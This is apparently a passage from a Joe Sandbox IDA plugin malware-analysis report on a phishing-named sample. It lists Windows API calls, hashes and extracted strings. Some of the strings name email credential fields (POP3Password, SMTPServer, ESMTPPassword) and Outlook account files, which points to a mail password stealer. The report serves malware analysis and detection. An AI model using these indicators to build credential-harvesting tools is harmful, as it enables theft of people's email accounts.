                                                              • Opcode ID: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                              • Opcode Fuzzy Hash: c670c5a1dac652336fc4502d32cc243de18414890d70e9aadfbf467d7e8899fc
                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                • Part of subcall function 0044B40E: GetModuleHandleA.KERNEL32(0044B405), ref: 0044B40E
                                                                • Part of subcall function 0044B40E: GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                • Part of subcall function 0044B40E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2099061454-0
                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                              • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                              • String ID:
                                                              • API String ID: 2152742572-0
                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                              • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                              APIs
                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,75570A60,?,00000000), ref: 00410D1C
                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              • memset.MSVCRT ref: 00410E10
                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 889583718-2036018995
                                                              • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                              • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                              APIs
                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                              APIs
                                                              • memset.MSVCRT ref: 004109F7
                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                              • memset.MSVCRT ref: 00410A32
                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                              • String ID:
                                                              • API String ID: 3143880245-0
                                                              • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                              • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                              APIs
                                                              • malloc.MSVCRT ref: 00406F4C
                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,`Wu,00407A43,00000001,?,00000000,`Wu,00407DBD,00000000,?,?), ref: 00406F64
                                                              • free.MSVCRT ref: 00406F6D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID: `Wu
                                                              • API String ID: 3056473165-3261129705
                                                              • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                              • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D5C
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D7A
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408D98
                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408DA8
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@
                                                              • String ID:
                                                              • API String ID: 1033339047-0
                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                              • String ID: Arial
                                                              • API String ID: 3853255127-493054409
                                                              • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                              • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                              APIs
                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: strlen$_strcmpimemset
                                                              • String ID: /stext
                                                              • API String ID: 520177685-3817206916
                                                              • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                              • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                              APIs
                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc
                                                              • String ID:
                                                              • API String ID: 145871493-0
                                                              • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                              • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                              APIs
                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                              • String ID:
                                                              • API String ID: 4165544737-0
                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                              APIs
                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                              APIs
                                                              • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                              APIs
                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                              APIs
                                                              • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                              • API String ID: 3963849919-1658304561
                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                              APIs
                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
